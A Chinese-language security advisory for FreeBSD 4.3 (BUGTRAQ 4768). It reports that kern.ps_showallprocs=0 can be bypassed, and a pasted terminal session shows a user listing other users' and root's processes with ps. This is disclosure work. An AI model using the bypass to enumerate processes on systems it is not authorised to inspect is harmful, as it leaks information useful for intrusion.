FreeBSD进程隐藏可绕过漏洞发布时间:2002-05-21 更新时间:2002-05-21 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:4768 受影响系统 FreeBSD FreeBSD 4.3详细描述 在FreeBSD系统中,通过sysctl调用设置kern.ps_showallprocs=0可使一般用户不能查看任意不属于他们自己的进程信息,其中存在漏洞可导致进程信息泄露。 从procfs文件系统,或者从ps命令中的特定选项可获得进程列表信息。 测试代码 sirat@fremen:ttyp3:~> ps -u5710 USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND seeba 5710 0,0 0,0 1388 0 p6 IWsJ - 0:00,00 -tcsh (tcsh) I may see also root's processes: sirat@fremen:ttyp3:~> ps -u205 USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 205 0,0 0,1 2064 264 ?? IsJ 9:23 0:00,05 /usr/sbin/sshd and ps axu gives: sirat@fremen:ttyp3:~> ps axu USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND sirat 40384 0,0 0,1 428 272 p3 R+J 18:53 0:00,00 ps axu root 515 0,0 0,3 1744 600 ?? SsJ 9:26 0:19,97 screen sirat 516 0,0 0,0 1404 0 p2 IWsJ - 0:00,00 /bin/tcsh sirat 519 0,0 0,9 3996 1672 p2 S+J 9:26 0:51,67 /usr/local/bin/irs sirat 588 0,0 0,5 1396 860 p0 IsJ 9:32 0:00,83 -tcsh (tcsh) sirat 1467 0,0 0,4 1400 844 p3 SsJ 9:37 0:00,52 -tcsh (tcsh) sirat 2183 0,0 0,0 1400 0 p5 IWs+J - 0:00,00 -tcsh (tcsh) sirat 4491 0,0 0,1 1604 124 p1 S+J 13:59 0:00,13 screen -r sirat 40359 0,0 0,9 2676 1660 p0 I+J 18:51 0:00,07 mutt sirat 40365 0,0 0,2 648 448 p0 I+J 18:51 0:00,01 sh -c joe '/home/s sirat 40366 0,0 0,5 1316 900 p0 S+J 18:51 0:00,12 joe /home/sirat/tm sirat 467 0,0 0,0 1396 0 p1 IWsJ - 0:00,00 -tcsh (tcsh) 解决方案 尚无 相关信息 参考:http://online.securityfocus.com/archive/1/273081 http://online.securityfocus.com/archive/1/273082 |
